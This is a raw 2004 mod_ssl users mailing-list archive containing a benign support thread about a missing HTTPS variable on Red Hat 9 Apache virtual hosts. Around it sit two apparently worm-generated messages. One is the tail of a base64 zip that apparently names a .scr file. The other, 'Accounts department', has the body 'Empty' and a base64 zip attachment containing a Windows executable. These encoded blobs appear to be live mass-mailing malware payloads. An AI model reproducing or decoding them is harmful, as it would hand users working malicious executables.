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
c3Z3LnNjclBLBQYAAAAAAQABADcAAADQUAAAAAA=

----------dnytkgciojteiwywbjyl--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 11:12:05 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8E176A8A6B; Tue,  2 Mar 2004 11:12:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from inet1.tecoweb.com (inet1.tecoweb.com [213.190.4.137])
	by master.modssl.org (Postfix) with ESMTP id 64061A893F
	for ; Tue,  2 Mar 2004 11:11:53 +0100 (CET)
Received: from est1.telecomputer.dom (10.Red-80-37-15.pooles.rima-tde.net [80.37.15.10])
	by inet1.tecoweb.com (Postfix) with ESMTP id 88155F5962
	for ; Tue,  2 Mar 2004 11:11:44 +0100 (CET)
Date: Tue, 2 Mar 2004 11:11:46 +0100
From: Alvaro Gonzalez 
X-Mailer: The Bat! (v2.00.6)
Organization: Tele Computer, S.L.
X-Priority: 3 (Normal)
Message-ID: <95428648233.20040302111146@telecomputeronline.com>
To: modssl-users@modssl.org
Subject: Re[4]: HTTPS variable is missing
In-Reply-To: 
References: <18361713196.20040301163617@telecomputeronline.com>
 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alvaro Gonzalez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

*** Merton Campbell Crockett escribió/wrote (01/03/2004 17:26 -0800 (PST)):
> The  is related to an apachectl option.  The following
> command starts Apache with SSL enabled.

> 	apachectl startssl

Actually, I've never paid too much attention to Apache startup since I
prefer to user the System V init scripts (/etc/init.d/httpd start and the
like) so I don't know whtere -DSSL is used. Facts are:

* mod_ssl is installed (RPM prebuilt package)
* SSL does work
*  is false

Maybe there are things man must not know ;-)


P.S. Am I the only one who doesn't receive list messages via e-amil and has
to read them through web interface?

-- 
Álvaro González Vicario
Tele Computer, S.L.
Burgos (Spain) 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 11:30:20 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 117DEA8A6F; Tue,  2 Mar 2004 11:30:20 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.193])
	by master.modssl.org (Postfix) with ESMTP id 4455AA893F
	for ; Tue,  2 Mar 2004 11:30:07 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [10.254.1.122])
	by maggotts.rnib.org.uk (8.12.8/8.12.8) with ESMTP id i21C0j5E025788
	for ; Mon, 1 Mar 2004 12:00:46 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2657.72)
	id ; Mon, 1 Mar 2004 12:00:45 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F05ADDD6F@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: HTTPS variable is missing
Date: Mon, 1 Mar 2004 12:00:41 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain;
	charset="ISO-8859-15"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Alvaro Gonzalez [mailto:alvaro@telecomputeronline.com]
> Sent: 01 March 2004 09:39
> To: modssl-users@modssl.org
> Subject: HTTPS variable is missing
> 
> 
> I have a Red Hat 9 server running Apache 2.0.40 + mod_ssl 
> with several name
> based virtual hosts. One of the sites works under http and https.
> Apparently everything goes fine (browser claims page is encryped when
> loading https and not encrypted when loading http) but I just 
> can't find
> the HTTPS environmental variable anywhere. It is there for main site
> (https://) but not for my virtual host.
> 
> I have access to two other linux boxes (Red Hat 7.3 with 
> Apache 1.x and a
> Mandrake with Apache 2.x) and that same config works just 
> fine: HTTPS=on
> when using SSL (no matter the host) and I can also access the 
> rest of SSL_*
> variables if I add "SSLOptions +StdEnvVars" to config file 
> (which doesn't
> work either in the Red Hat 9 server). Of course there's probably a
> difference somewhere (servers aren't identical) but I just 
> can't find it. I
> understand I can only use one certificate for one IP-port 
> combination but I
> don't mind browser warnings about that; as I said, that works 
> fine in my
> other linux boxes.
> 
> I've left most default options at "httpd.conf". I only added 
> some virtual
> hosts:
> 
> 
> 
>         DocumentRoot /home/site/htdocs
>         ServerName www.site.com
>         ErrorLog logs/site.com_error_log
>         CustomLog logs/site.com_access_log combined
>         
>                 AllowOverride All
>                 Options FollowSymLinks
>         
> 
> 
>         DocumentRoot /home/site/htdocs
>         ServerName www.site.com
>         ErrorLog logs/site.com_error_log
>         CustomLog logs/site.com_access_log combined
>         
>                 AllowOverride All
>                 Options FollowSymLinks
>         
>         
>                 SSLEngine on
>                 SSLCertificateFile 
> /etc/httpd/conf/ssl.crt/www.site.com.crt
>                 SSLCertificateKeyFile 
> /etc/httpd/conf/ssl.key/www.site.com.key
>         
> 
> 
I'd suggest that you lose the "IfDefine" lines. If you are listening on port
443, it makes more sense to turn the SSLEngine "on" anyway and the
associated SSL certificate lines. There isn't a good reason I can think of
for not enabling SSL on port 443.

Also, check that you have the mod_ssl package installed with "rpm -q
mod_ssl". That will probably explain your woes.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Why do so many people who call themselves christians use the name of Jesus
Christ as a swear word?


- 
DISCLAIMER: 

NOTICE: The information contained in this email and any attachments is 
confidential and may be privileged. If you are not the intended 
recipient you should not use, disclose, distribute or copy any of the 
content of it or of any attachment; you are requested to notify the 
sender immediately of your receipt of the email and then to delete it 
and any attachments from your system. 

RNIB endeavours to ensure that emails and any attachments generated by 
its staff are free from viruses or other contaminants. However, it 
cannot accept any responsibility for any  such which are transmitted.
We therefore recommend you scan all attachments. 

Please note that the statements and views expressed in this email and 
any attachments are those of the author and do not necessarily represent 
those of RNIB. 

RNIB Registered Charity Number: 226227 

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 12:00:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 13BDCA8A6F; Tue,  2 Mar 2004 12:00:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bil (mefisto.idzik.pl [62.111.219.66])
	by master.modssl.org (Postfix) with SMTP id 8CFBBA8973
	for ; Tue,  2 Mar 2004 11:59:49 +0100 (CET)
Date: Tue, 02 Mar 2004 11:59:59 +0100
To: modssl-users@modssl.org
Subject: Accounts department
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------dcvfnpfbjpobxnouupwt"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------dcvfnpfbjpobxnouupwt
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Empty

----------dcvfnpfbjpobxnouupwt
Content-Type: application/octet-stream; name="edebd.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="eda.zip"

UEsDBAoAAAAAAGBOYjBYbjOVjkUAAI5FAAAMAAAAcGZlZnNmeXkuZXhlTVqQAAMAAAAEAAAA
//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4f
ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAADOonn7isMXqIrDF6iKwxeoisMXqInDF6gE3ASousMXqGLcEqiLwxeoduMFqIvD
F6hNxRGoi8MXqFJpY2iKwxeoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQAAAAAA
AAAAAAAAAADgAA8BCwEAAAAOAAAAYAAAAAAAAACgAAAAEAAAACAAAAAAQAAAEAAAAAIAAAQA
AAAAAAAABAAAAAAAAAAA4AAAAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA
AAAAAAAAAAAxogAA0QAAAACQAACgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAKwAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAgAAAAADgAAAAAAAAQNAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAA
AABAAADAAAYAAAAAAACKBAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAwABSAAAAAAAA
9FQAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAKADAAAAkAAAAAQAAAAE
AAAAAAAAAAAAAAAAAQBAAADAAAAAAAAAAAAAQAAAAKAAAAA6AAAACAAAAAAAAAAAAAAAAAAA
QAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AgADAAAAIAAAgA4AAAA4AACAAAAAAAAAAAAAAAAAAAABAAEAAABQAACAAAAAAAAAAAAAAAAA
AAABAAEAAABoAACAAAAAAAAAAAAAAAAAAAABAAAAAACAAAAAAAAAAAAAAAAAAAAAAAABAAAA
AACQAAAAoJAAAOgCAAAAAAAAAAAAAIiTAAAUAAAAAAAAAAAAAAAoAAAAIAAAAEAAAAABAAQA
AAAAAIACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAAgIAAAICA
gADAwMAAAAD/AAAAAAAA//8A/wAAAP8A/wD//wAA////AKqqAAAAAAAAAAAAAAAKqqqqp4iI
iIiIiIiIiIiAgKqqqn//////////////+AgKqqp///////////////gICqqqf/AAAA//////
///4CAqqqn//////////////+AgKqqp/8AAAD/////////gICqqqf//////////////4CAqq
qn//////////////+AgKqqp/8AAAAAAAAAAAD/gICqqqf//////////////4CAqqqn/wAAAA
AAAAAAAP+AgKqqp///////////////gICqqqf/AAAAAAAAAAAA/4CAqqqn//////////////
+AgKqqp/8AAAAAAAAAAAD/gICqqqf//////////////4CAqqqn//////////////+AgKqqp/
8AAAD/////////gICqqqf//////////////4CAqqqn//////////////+AgKqqp/////////
//////gICqqqf/AAAA/////////4CAqqqn//////////////+AgKqqp/8AAAD////w8AD/gI
Cqqqf//////////////4CAqqqn//////////////+AgKqqp///////////////gICqqqfw/w
/w/w/w/w/w/3CAqqqn8P8P8P8P8P8P8P9wgKqqqn939393939393939wqqqqqgCgCgCgCgCg
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
